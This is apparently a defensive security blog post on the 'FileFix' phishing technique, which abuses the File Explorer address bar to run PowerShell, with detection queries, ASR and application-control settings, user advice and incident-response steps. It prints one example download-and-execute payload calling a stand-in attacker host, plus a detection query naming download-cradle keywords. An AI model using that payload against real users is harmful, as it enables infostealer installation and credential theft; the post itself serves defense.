FileFix Attack: How Crooks Hijack the File Explorer Address Bar to Run PowerShell (And How to Stop It)

For most of 2024 and early 2025, the social-engineering trick that kept landing infostealers on Windows machines was ClickFix: a fake CAPTCHA or "fix this error" page that told victims to press Win+R, paste a command, and hit Enter. Defenders adapted. We taught users that the Run dialog is sacred ground, EDR vendors started flagging explorer.exe spawning powershell.exe after a Run-box launch, and detection rates climbed.

Attackers responded with a cleaner variant called FileFix. It abuses something almost nobody thinks of as a command prompt: the address bar at the top of every File Explorer and file-upload dialog. In my experience securing small-business endpoints, this one catches people who would never fall for the Run-box trick, because pasting a "file path" into File Explorer feels completely normal. That instinct is exactly what gets exploited.

FileFix was first documented publicly by the security researcher known as mr.d0x in mid-2025, and threat actors began folding it into live phishing kits within weeks. Below is how the technique actually works, why it slips past habits you have already trained, and the concrete steps that stop it on both managed and unmanaged Windows fleets.

What FileFix Actually Does

The Windows File Explorer address bar is not just a breadcrumb display. If you type a command into it and press Enter, Explorer will execute it the same way cmd.exe would. Type powershell and a shell opens. Type a full command line and it runs, inheriting the user's privileges, with explorer.exe as the parent process.

FileFix weaponizes that behavior through a phishing page. The flow looks like this:

• The victim lands on a page claiming a document has been shared with them, that they need to "verify" a file, or that they must open a path their "IT department" sent.
• The page has a Copy button next to what looks like an innocent file path, for example \\company-share\HR\Q2-Review.pdf.
• The page also (often) triggers the OS file-open dialog by using an HTML file input, giving the user a real File Explorer window to paste into.
• When the victim clicks Copy, the clipboard does not just contain that path. It contains a PowerShell command, with the harmless-looking path tacked on as a comment so the visible portion looks legitimate.

That last point is the trick. The clipboard payload looks roughly like this:

powershell -w hidden -c "iwr https://evil.example/a.ps1 | iex" # \\company-share\HR\Q2-Review.pdf

Everything after the # is a PowerShell comment, so it is ignored at execution time. But because the address bar field is narrow and the decoy path is positioned to be what the user sees, the victim believes they pasted a file path. They press Enter, the hidden download-and-execute runs, and an infostealer such as StealC, Lumma-style grabbers, or a remote access tool lands on disk. The -w hidden flag suppresses the window so nothing flashes on screen.

Why It Beats ClickFix Awareness Training

The defensive message for ClickFix was blunt: "Never paste anything into the Run box." That advice does not transfer. Pasting a path into File Explorer is a thing legitimate users do every day, and the file-open dialog appears as part of a normal-looking workflow rather than a keyboard shortcut nobody recognizes. FileFix also avoids the Win+R launch chain that many detections keyed on, and the execution still parents to explorer.exe, which is one of the noisiest, most-whitelisted processes on Windows.

How to Detect FileFix Activity

The good news is that FileFix produces a very specific, very abnormal parent-child process relationship. Explorer launching a scripting engine is rare in legitimate use. Build detections around that.

Sysmon and EDR Process-Tree Rules

If you run Sysmon, watch Event ID 1 (process creation) for these parent-child pairs where the parent is explorer.exe:

• powershell.exe or pwsh.exe
• cmd.exe
• wscript.exe / cscript.exe
• mshta.exe
• conhost.exe chained into any of the above

A user double-clicking a document does not spawn PowerShell from Explorer. When you see explorer.exe → powershell.exe with command-line flags like -w hidden, -enc (Base64 encoded command), -nop (no profile), or a download cradle (iwr, Invoke-WebRequest, DownloadString, iex), treat it as high-confidence malicious. In Microsoft Defender for Endpoint, this Kusto query surfaces it:

DeviceProcessEvents | where InitiatingProcessFileName =~ "explorer.exe" | where FileName in~ ("powershell.exe","pwsh.exe","cmd.exe","mshta.exe","wscript.exe") | where ProcessCommandLine has_any ("hidden","-enc","iex","DownloadString","Invoke-WebRequest","iwr")

Turn On PowerShell Logging

You cannot investigate what you do not record. Enable all three layers of PowerShell logging through Group Policy under Administrative Templates → Windows Components → Windows PowerShell:

• Script Block Logging (Event ID 4104) captures the actual code executed, even when it was obfuscated or Base64-encoded on the command line.
• Module Logging records pipeline activity.
• Transcription writes a full session transcript to a protected file share for forensic review.

Script Block Logging is the single most valuable one here, because FileFix payloads are almost always encoded or remote-fetched, and 4104 deobfuscates them for you after the fact.

How to Block FileFix (Prevention)

Detection tells you it happened. The goal is to make sure it cannot. Layer these controls.

1. Microsoft Defender Attack Surface Reduction Rules

ASR rules stop the execution chain even on otherwise unmanaged endpoints, and they are free with Defender. Enable these in block mode (not audit) once you have validated them:

• Block execution of potentially obfuscated scripts – catches the encoded PowerShell payloads FileFix relies on.
• Block process creations originating from PSExec and WMI commands – limits lateral movement after a foothold.
• Block all Office applications from creating child processes – closes the adjacent document-based delivery path.

Deploy with PowerShell or Intune. Example to enable the obfuscated-script rule in block mode:

Set-MpPreference -AttackSurfaceReductionRules_Ids 5BEB7EFE-FD9A-4556-801D-275E5FFC04CC -AttackSurfaceReductionRules_Actions Enabled

Roll these out in audit mode first for a week, review what would have been blocked, then flip to enforce. I have seen a poorly-tested ASR rule break a legitimate line-of-business script, so validate before enforcing fleet-wide.

2. Constrain or Remove PowerShell for Standard Users

Most office workers never need an interactive PowerShell session. Two strong options:

• Constrained Language Mode via WDAC (Windows Defender Application Control) neuters the .NET method calls that download cradles depend on. A FileFix payload trying to call Net.WebClient simply fails.
• Application control with WDAC or AppLocker to allow only signed, approved scripts. This is the most durable fix because it does not rely on recognizing a specific technique.

3. Block Command Execution from the Explorer Address Bar

You can disable the address bar's ability to run arbitrary commands through Group Policy. Under User Configuration → Administrative Templates → Windows Components → File Explorer, the policy "Remove the Address bar" is heavy-handed but available for high-risk kiosk-style accounts. A lighter approach is removing the run history and restricting the Run command, though the cleanest mitigation remains application control on the scripting engines themselves, since that blocks the payload no matter how it is launched.

4. Web and Email Filtering

FileFix pages are delivered the same way every other phishing lure is: links in email, malicious ads, and compromised sites. Make sure your secure email gateway and DNS filtering (Cloudflare Gateway, Cisco Umbrella, or even Quad9 for tiny shops) are catching newly-registered domains and known phishing infrastructure. Block downloads of .ps1, .hta, and unsigned scripts at the proxy.

What to Tell Your Users

Awareness still matters, but the message has to evolve past "don't use the Run box." The accurate, durable rule is:

• Never paste anything from a website into File Explorer, the address bar, the Run dialog, or a terminal. No legitimate document-sharing workflow asks you to copy a "path" from a web page and paste it into Windows.
• If a page tells you to copy something and paste it anywhere in Windows to "verify," "fix," or "open" a file, it is an attack. Close the tab.
• Real shared files arrive as a download or a link you click, not a string you paste into the operating system.
• When in doubt, paste the clipboard contents into Notepad first. If a "file path" turns out to start with powershell or contains a URL, you just caught an attack.

That Notepad tip is the one I push hardest with small-business staff. It takes three seconds, it is harmless, and it exposes the decoy-comment trick instantly because the hidden command becomes visible in plain text.

If You Think a Machine Was Hit

FileFix delivers infostealers and remote access tools, which means the real damage is credential theft within minutes of execution. Treat any confirmed run as a credential-compromise incident, not just a malware cleanup:

• Isolate the host from the network immediately. Do not just "run an antivirus scan" and move on.
• Pull the evidence while the box is offline: PowerShell 4104 logs, Sysmon process events, the user's browser profile timestamps, and any new scheduled tasks or run keys.
• Rotate credentials the user touched on that machine, starting with email, VPN, and any saved browser passwords. Infostealers grab browser-stored credentials, cookies, and session tokens, so password rotation alone is not enough – invalidate active sessions too.
• Revoke session cookies and tokens for cloud accounts (Microsoft 365, Google Workspace) because stolen session cookies let attackers bypass MFA. Force a global sign-out.
• Rebuild rather than clean if you cannot confidently scope what ran. Reimaging is cheaper than a second incident from a missed implant.

The Bigger Pattern

FileFix is one entry in a fast-moving family of "paste-this-to-fix-it" attacks, and it will not be the last. The underlying problem is that Windows has several places where pasted text becomes executed code, and attackers will keep cycling through them as defenders harden each one. The Run dialog, the File Explorer address bar, the file-open dialog, terminal windows, and even browser developer consoles have all been used this way.

The defenses that hold up across all of these variants are the ones that do not depend on recognizing the specific lure: application control that allows only approved scripts, ASR rules that block obfuscated execution, PowerShell logging that gives you visibility, and a clear user rule that nothing copied from a web page ever gets pasted into Windows itself. Get those four in place and FileFix stops being a threat regardless of how the phishing page dresses it up.

Start with PowerShell Script Block Logging and the two Defender ASR rules today – they are the highest-impact, lowest-friction wins. Then work toward application control as your durable, technique-agnostic backstop. The attackers have already moved past ClickFix. Your defenses should be built to outlast whatever comes after FileFix too.